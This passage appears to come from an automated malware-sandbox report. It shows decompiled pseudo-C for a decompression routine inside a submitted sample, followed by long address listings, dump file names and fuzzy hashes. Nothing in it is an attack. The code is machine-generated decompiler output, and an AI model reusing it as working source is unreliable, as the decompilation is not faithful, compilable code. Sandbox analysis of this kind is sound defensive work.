									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                          0x004067b7
                                                          0x004067be
                                                          0x004067c4
                                                          0x004067ca
                                                          0x00000000
                                                          0x004067ce
                                                          0x004067da
                                                          0x004067da
                                                          0x004067da
                                                          0x004067e3
                                                          0x00000000
                                                          0x00000000
                                                          0x004067e9
                                                          0x00000000
                                                          0x004067f0
                                                          0x004067f4
                                                          0x00000000
                                                          0x00000000
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406805
                                                          0x00406807
                                                          0x00000000
                                                          0x00000000
                                                          0x0040680d
                                                          0x00406810
                                                          0x00406812
                                                          0x00406813
                                                          0x00406816
                                                          0x00406818
                                                          0x00406819
                                                          0x0040681b
                                                          0x0040681e
                                                          0x00406823
                                                          0x00406828
                                                          0x00406831
                                                          0x00406844
                                                          0x00406847
                                                          0x00406850
                                                          0x00406853
                                                          0x0040687b
                                                          0x0040687b
                                                          0x0040687d
                                                          0x0040688b
                                                          0x0040688b
                                                          0x0040688f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040687f
                                                          0x0040687f
                                                          0x00406882
                                                          0x00406882
                                                          0x00406883
                                                          0x00406883
                                                          0x00000000
                                                          0x0040687f
                                                          0x00406855
                                                          0x00406859
                                                          0x0040685e
                                                          0x0040685e
                                                          0x00406867
                                                          0x0040686d
                                                          0x0040686f
                                                          0x00406872
                                                          0x00000000
                                                          0x00406878
                                                          0x00406878
                                                          0x00000000
                                                          0x00406878
                                                          0x00000000
                                                          0x00406895
                                                          0x00406895
                                                          0x00406899
                                                          0x00407145
                                                          0x00000000
                                                          0x00407145
                                                          0x004068a2
                                                          0x004068b2
                                                          0x004068b5
                                                          0x004068b8
                                                          0x004068b8
                                                          0x004068b8
                                                          0x004068bb
                                                          0x004068bb
                                                          0x004068bf
                                                          0x00000000
                                                          0x00000000
                                                          0x004068c1
                                                          0x004068c4
                                                          0x004068c7
                                                          0x004068f1
                                                          0x004068f7
                                                          0x004068fe
                                                          0x00000000
                                                          0x004068fe
                                                          0x004068c9
                                                          0x004068cd
                                                          0x004068d0
                                                          0x004068d5
                                                          0x004068d5
                                                          0x004068e0
                                                          0x004068e6
                                                          0x004068e8
                                                          0x004068eb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406930
                                                          0x00406936
                                                          0x00406939
                                                          0x00406946
                                                          0x0040694e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406905
                                                          0x00406905
                                                          0x00406909
                                                          0x00407154
                                                          0x00000000
                                                          0x00407154
                                                          0x00406915
                                                          0x00406920
                                                          0x00406920
                                                          0x00406920
                                                          0x00406923
                                                          0x00406926
                                                          0x00406929
                                                          0x0040692c
                                                          0x0040692e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406fc5
                                                          0x00406fc5
                                                          0x00406fcb
                                                          0x00406fd1
                                                          0x00406fd4
                                                          0x00406fd7
                                                          0x00406ff1
                                                          0x00406ff4
                                                          0x00406ffa
                                                          0x00407005
                                                          0x00407005
                                                          0x00407007
                                                          0x00406fd9
                                                          0x00406fd9
                                                          0x00406fe8
                                                          0x00406fec
                                                          0x00406fec
                                                          0x0040700a
                                                          0x00407011
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407013
                                                          0x00407013
                                                          0x00407017
                                                          0x004071c6
                                                          0x00000000
                                                          0x004071c6
                                                          0x00407023
                                                          0x0040702a
                                                          0x00407032
                                                          0x00407032
                                                          0x00407032
                                                          0x00407035
                                                          0x00407038
                                                          0x00407038
                                                          0x00000000
                                                          0x00000000
                                                          0x00406956
                                                          0x00406958
                                                          0x0040695b
                                                          0x004069cc
                                                          0x004069cf
                                                          0x004069d2
                                                          0x004069d9
                                                          0x004069e3
                                                          0x00000000
                                                          0x004069e3
                                                          0x0040695d
                                                          0x00406961
                                                          0x00406964
                                                          0x00406966
                                                          0x00406969
                                                          0x0040696c
                                                          0x0040696e
                                                          0x00406971
                                                          0x00406973
                                                          0x00406978
                                                          0x0040697b
                                                          0x0040697e
                                                          0x00406982
                                                          0x00406989
                                                          0x0040698c
                                                          0x00406993
                                                          0x00406997
                                                          0x0040699f
                                                          0x0040699f
                                                          0x0040699f
                                                          0x00406999
                                                          0x00406999
                                                          0x00406999
                                                          0x0040698e
                                                          0x0040698e
                                                          0x0040698e
                                                          0x004069a3
                                                          0x004069a6
                                                          0x004069c4
                                                          0x004069c6
                                                          0x00000000
                                                          0x004069c6
                                                          0x004069a8
                                                          0x004069ab
                                                          0x004069ae
                                                          0x004069b1
                                                          0x004069b3
                                                          0x004069b3
                                                          0x004069b3
                                                          0x004069b6
                                                          0x004069b9
                                                          0x004069bb
                                                          0x004069bc
                                                          0x004069bf
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf5
                                                          0x00406bf9
                                                          0x00406c17
                                                          0x00406c1a
                                                          0x00406c21
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2a
                                                          0x00406c2d
                                                          0x00406c30
                                                          0x00406c32
                                                          0x00406c39
                                                          0x00406c3a
                                                          0x00406c3c
                                                          0x00406c3f
                                                          0x00406c42
                                                          0x00406c45
                                                          0x00406c45
                                                          0x00406c4a
                                                          0x00000000
                                                          0x00406c4a
                                                          0x00406bfb
                                                          0x00406bfe
                                                          0x00406c01
                                                          0x00406c0b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c5f
                                                          0x00406c63
                                                          0x00406c86
                                                          0x00406c89
                                                          0x00406c8c
                                                          0x00406c96
                                                          0x00406c65
                                                          0x00406c65
                                                          0x00406c68
                                                          0x00406c6b
                                                          0x00406c6e
                                                          0x00406c7b
                                                          0x00406c7e
                                                          0x00406c7e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ca2
                                                          0x00406ca6
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cac
                                                          0x00406cb0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cb6
                                                          0x00406cb8
                                                          0x00406cbc
                                                          0x00406cbc
                                                          0x00406cbf
                                                          0x00406cc3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d13
                                                          0x00406d17
                                                          0x00406d1e
                                                          0x00406d21
                                                          0x00406d24
                                                          0x00406d2e
                                                          0x00000000
                                                          0x00406d2e
                                                          0x00406d19
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d3a
                                                          0x00406d3e
                                                          0x00406d45
                                                          0x00406d48
                                                          0x00406d4b
                                                          0x00406d40
                                                          0x00406d40
                                                          0x00406d40
                                                          0x00406d4e
                                                          0x00406d51
                                                          0x00406d54
                                                          0x00406d54
                                                          0x00406d57
                                                          0x00406d5a
                                                          0x00406d5d
                                                          0x00406d5d
                                                          0x00406d60
                                                          0x00406d67
                                                          0x00406d6c
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dfa
                                                          0x00406dfa
                                                          0x00406dfe
                                                          0x0040719c
                                                          0x00000000
                                                          0x0040719c
                                                          0x00406e04
                                                          0x00406e07
                                                          0x00406e0a
                                                          0x00406e0e
                                                          0x00406e11
                                                          0x00406e17
                                                          0x00406e19
                                                          0x00406e19
                                                          0x00406e19
                                                          0x00406e1c
                                                          0x00406e1f
                                                          0x00000000
                                                          0x00000000
                                                          0x004069ef
                                                          0x004069ef
                                                          0x004069f3
                                                          0x00407160
                                                          0x00000000
                                                          0x00407160
                                                          0x004069f9
                                                          0x004069fc
                                                          0x004069ff
                                                          0x00406a03
                                                          0x00406a06
                                                          0x00406a0c
                                                          0x00406a0e
                                                          0x00406a0e
                                                          0x00406a0e
                                                          0x00406a11
                                                          0x00406a14
                                                          0x00406a14
                                                          0x00406a17
                                                          0x00406a1a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a20
                                                          0x00406a26
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a2c
                                                          0x00406a2c
                                                          0x00406a30
                                                          0x00406a33
                                                          0x00406a36
                                                          0x00406a39
                                                          0x00406a3c
                                                          0x00406a3d
                                                          0x00406a40
                                                          0x00406a42
                                                          0x00406a48
                                                          0x00406a4b
                                                          0x00406a4e
                                                          0x00406a51
                                                          0x00406a54
                                                          0x00406a57
                                                          0x00406a5a
                                                          0x00406a76
                                                          0x00406a79
                                                          0x00406a7c
                                                          0x00406a7f
                                                          0x00406a86
                                                          0x00406a8a
                                                          0x00406a8c
                                                          0x00406a90
                                                          0x00406a5c
                                                          0x00406a5c
                                                          0x00406a60
                                                          0x00406a68
                                                          0x00406a6d
                                                          0x00406a6f
                                                          0x00406a71
                                                          0x00406a71
                                                          0x00406a93
                                                          0x00406a9a
                                                          0x00406a9d
                                                          0x00000000
                                                          0x00406aa3
                                                          0x00000000
                                                          0x00406aa3
                                                          0x00000000
                                                          0x00406aa8
                                                          0x00406aa8
                                                          0x00406aac
                                                          0x0040716c
                                                          0x00000000
                                                          0x0040716c
                                                          0x00406ab2
                                                          0x00406ab5
                                                          0x00406ab8
                                                          0x00406abc
                                                          0x00406abf
                                                          0x00406ac5
                                                          0x00406ac7
                                                          0x00406ac7
                                                          0x00406ac7
                                                          0x00406aca
                                                          0x00406acd
                                                          0x00406acd
                                                          0x00406acd
                                                          0x00406ad3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ad5
                                                          0x00406ad8
                                                          0x00406adb
                                                          0x00406ade
                                                          0x00406ae1
                                                          0x00406ae4
                                                          0x00406ae7
                                                          0x00406aea
                                                          0x00406aed
                                                          0x00406af0
                                                          0x00406af3
                                                          0x00406b0b
                                                          0x00406b0e
                                                          0x00406b11
                                                          0x00406b14
                                                          0x00406b14
                                                          0x00406b17
                                                          0x00406b1b
                                                          0x00406b1d
                                                          0x00406af5
                                                          0x00406af5
                                                          0x00406afd
                                                          0x00406b02
                                                          0x00406b04
                                                          0x00406b06
                                                          0x00406b06
                                                          0x00406b20
                                                          0x00406b27
                                                          0x00406b2a
                                                          0x00000000
                                                          0x00406b2c
                                                          0x00000000
                                                          0x00406b2c
                                                          0x00406b2a
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b6c
                                                          0x00406b6c
                                                          0x00406b70
                                                          0x00407178
                                                          0x00000000
                                                          0x00407178
                                                          0x00406b76
                                                          0x00406b79
                                                          0x00406b7c
                                                          0x00406b80
                                                          0x00406b83
                                                          0x00406b89
                                                          0x00406b8b
                                                          0x00406b8b
                                                          0x00406b8b
                                                          0x00406b8e
                                                          0x00406b91
                                                          0x00406b91
                                                          0x00406b97
                                                          0x00406b35
                                                          0x00406b35
                                                          0x00406b38
                                                          0x00000000
                                                          0x00406b38
                                                          0x00406b99
                                                          0x00406b99
                                                          0x00406b9c
                                                          0x00406b9f
                                                          0x00406ba2
                                                          0x00406ba5
                                                          0x00406ba8
                                                          0x00406bab
                                                          0x00406bae
                                                          0x00406bb1
                                                          0x00406bb4
                                                          0x00406bb7
                                                          0x00406bcf
                                                          0x00406bd2
                                                          0x00406bd5
                                                          0x00406bd8
                                                          0x00406bd8
                                                          0x00406bdb
                                                          0x00406bdf
                                                          0x00406be1
                                                          0x00406bb9
                                                          0x00406bb9
                                                          0x00406bc1
                                                          0x00406bc6
                                                          0x00406bc8
                                                          0x00406bca
                                                          0x00406bca
                                                          0x00406be4
                                                          0x00406beb
                                                          0x00406bee
                                                          0x00000000
                                                          0x00406bf0
                                                          0x00000000
                                                          0x00406bf0
                                                          0x00000000
                                                          0x00406e7d
                                                          0x00406e7d
                                                          0x00406e81
                                                          0x004071a8
                                                          0x00000000
                                                          0x004071a8
                                                          0x00406e87
                                                          0x00406e8a
                                                          0x00406e8d
                                                          0x00406e91
                                                          0x00406e94
                                                          0x00406e9a
                                                          0x00406e9c
                                                          0x00406e9c
                                                          0x00406e9c
                                                          0x00406e9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c4d
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f8c
                                                          0x00406f90
                                                          0x00406fb2
                                                          0x00406fb5
                                                          0x00406fbf
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406fc2
                                                          0x00406f92
                                                          0x00406f95
                                                          0x00406f99
                                                          0x00406f9c
                                                          0x00406f9c
                                                          0x00406f9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00407049
                                                          0x0040704d
                                                          0x0040706b
                                                          0x0040706b
                                                          0x0040706b
                                                          0x00407072
                                                          0x00407079
                                                          0x00407080
                                                          0x00407080
                                                          0x00000000
                                                          0x00407080
                                                          0x0040704f
                                                          0x00407052
                                                          0x00407055
                                                          0x00407058
                                                          0x0040705f
                                                          0x00406fa3
                                                          0x00406fa3
                                                          0x00406fa6
                                                          0x00000000
                                                          0x00000000
                                                          0x0040713a
                                                          0x0040713d
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d74
                                                          0x00406d76
                                                          0x00406d7d
                                                          0x00406d7e
                                                          0x00406d80
                                                          0x00406d83
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d8b
                                                          0x00406d8e
                                                          0x00406d91
                                                          0x00406d93
                                                          0x00406d95
                                                          0x00406d95
                                                          0x00406d96
                                                          0x00406d99
                                                          0x00406da0
                                                          0x00406da3
                                                          0x00406db1
                                                          0x00000000
                                                          0x00000000
                                                          0x00407087
                                                          0x00407087
                                                          0x0040708a
                                                          0x00407091
                                                          0x00000000
                                                          0x00000000
                                                          0x00407096
                                                          0x00407096
                                                          0x0040709a
                                                          0x004071d2
                                                          0x00000000
                                                          0x004071d2
                                                          0x004070a0
                                                          0x004070a3
                                                          0x004070a6
                                                          0x004070aa
                                                          0x004070ad
                                                          0x004070b3
                                                          0x004070b5
                                                          0x004070b5
                                                          0x004070b5
                                                          0x004070b8
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070be
                                                          0x004070be
                                                          0x004070c2
                                                          0x00407122
                                                          0x00407125
                                                          0x0040712a
                                                          0x0040712b
                                                          0x0040712d
                                                          0x0040712f
                                                          0x00407132
                                                          0x0040703e
                                                          0x0040703e
                                                          0x00000000
                                                          0x0040703e
                                                          0x004070c4
                                                          0x004070ca
                                                          0x004070cd
                                                          0x004070d0
                                                          0x004070d3
                                                          0x004070d6
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e5
                                                          0x004070fe
                                                          0x00407101
                                                          0x00407104
                                                          0x00407107
                                                          0x0040710b
                                                          0x0040710d
                                                          0x0040710d
                                                          0x0040710e
                                                          0x00407111
                                                          0x004070e7
                                                          0x004070e7
                                                          0x004070ef
                                                          0x004070f4
                                                          0x004070f6
                                                          0x004070f9
                                                          0x004070f9
                                                          0x00407114
                                                          0x0040711b
                                                          0x00000000
                                                          0x0040711d
                                                          0x00000000
                                                          0x0040711d
                                                          0x00000000
                                                          0x00406db9
                                                          0x00406dbc
                                                          0x00406df2
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f28
                                                          0x00406f2a
                                                          0x004071b4
                                                          0x00000000
                                                          0x004071b4
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f39
                                                          0x00406f3d
                                                          0x00406f40
                                                          0x00406f40
                                                          0x00406f40
                                                          0x00000000
                                                          0x00406f40
                                                          0x00406dbe
                                                          0x00406dc0
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc7
                                                          0x00406dc8
                                                          0x00406dca
                                                          0x00406dcc
                                                          0x00406dcf
                                                          0x00406dd2
                                                          0x00406de8
                                                          0x00406ded
                                                          0x00406e25
                                                          0x00406e25
                                                          0x00406e29
                                                          0x00406e55
                                                          0x00406e57
                                                          0x00406e5e
                                                          0x00406e61
                                                          0x00406e64
                                                          0x00406e64
                                                          0x00406e69
                                                          0x00406e69
                                                          0x00406e6b
                                                          0x00406e6e
                                                          0x00406e75
                                                          0x00406e78
                                                          0x00406ea5
                                                          0x00406ea5
                                                          0x00406ea8
                                                          0x00406eab
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00000000
                                                          0x00406f1f
                                                          0x00406ead
                                                          0x00406eb3
                                                          0x00406eb6
                                                          0x00406eb9
                                                          0x00406ebc
                                                          0x00406ebf
                                                          0x00406ec2
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ecb
                                                          0x00406ece
                                                          0x00406ee7
                                                          0x00406ee9
                                                          0x00406eec
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef2
                                                          0x00406ef5
                                                          0x00406ef7
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406efe
                                                          0x00406f01
                                                          0x00406f05
                                                          0x00406f07
                                                          0x00406f07
                                                          0x00406f08
                                                          0x00406f0b
                                                          0x00406f0e
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed8
                                                          0x00406edd
                                                          0x00406edf
                                                          0x00406ee2
                                                          0x00406ee2
                                                          0x00406f11
                                                          0x00406f18
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00000000
                                                          0x00406f1a
                                                          0x00000000
                                                          0x00406f1a
                                                          0x00406f18
                                                          0x00406e2b
                                                          0x00406e2e
                                                          0x00406e30
                                                          0x00406e33
                                                          0x00406e36
                                                          0x00406e39
                                                          0x00406e3b
                                                          0x00406e3e
                                                          0x00406e41
                                                          0x00406e41
                                                          0x00406e44
                                                          0x00406e44
                                                          0x00406e47
                                                          0x00406e4e
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00000000
                                                          0x00406e50
                                                          0x00000000
                                                          0x00406e50
                                                          0x00406e4e
                                                          0x00406dd4
                                                          0x00406dd7
                                                          0x00406dd9
                                                          0x00406ddc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b3b
                                                          0x00406b3b
                                                          0x00406b3f
                                                          0x00407184
                                                          0x00000000
                                                          0x00407184
                                                          0x00406b45
                                                          0x00406b48
                                                          0x00406b4b
                                                          0x00406b4e
                                                          0x00406b51
                                                          0x00406b54
                                                          0x00406b57
                                                          0x00406b59
                                                          0x00406b5c
                                                          0x00406b5f
                                                          0x00406b62
                                                          0x00406b64
                                                          0x00406b64
                                                          0x00406b64
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cc6
                                                          0x00406cc6
                                                          0x00406cca
                                                          0x00407190
                                                          0x00000000
                                                          0x00407190
                                                          0x00406cd0
                                                          0x00406cd3
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cdb
                                                          0x00406cdb
                                                          0x00406cdb
                                                          0x00406cde
                                                          0x00406ce1
                                                          0x00406ce4
                                                          0x00406ce7
                                                          0x00406cea
                                                          0x00406ced
                                                          0x00406cee
                                                          0x00406cf0
                                                          0x00406cf0
                                                          0x00406cf0
                                                          0x00406cf3
                                                          0x00406cf6
                                                          0x00406cf9
                                                          0x00406cfc
                                                          0x00406cfc
                                                          0x00406cfc
                                                          0x00406cff
                                                          0x00406d01
                                                          0x00406d01
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f43
                                                          0x00406f43
                                                          0x00406f43
                                                          0x00406f47
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f4d
                                                          0x00406f50
                                                          0x00406f53
                                                          0x00406f56
                                                          0x00406f58
                                                          0x00406f58
                                                          0x00406f58
                                                          0x00406f5b
                                                          0x00406f5e
                                                          0x00406f61
                                                          0x00406f64
                                                          0x00406f67
                                                          0x00406f6a
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f70
                                                          0x00406f73
                                                          0x00406f76
                                                          0x00406f79
                                                          0x00406f7c
                                                          0x00406f80
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00000000
                                                          0x00406f87
                                                          0x00406d04
                                                          0x00406d04
                                                          0x00000000
                                                          0x00406d04
                                                          0x00406f85
                                                          0x004071ba
                                                          0x004071dc
                                                          0x004071e2
                                                          0x004071e4
                                                          0x004071eb
                                                          0x00000000
                                                          0x00000000
                                                          0x004067e9
                                                          0x004071f1
                                                          0x004071f1
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                          • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                                          • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                          • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406BF5 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E00406BF5() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004071F9))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4)); // executed
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
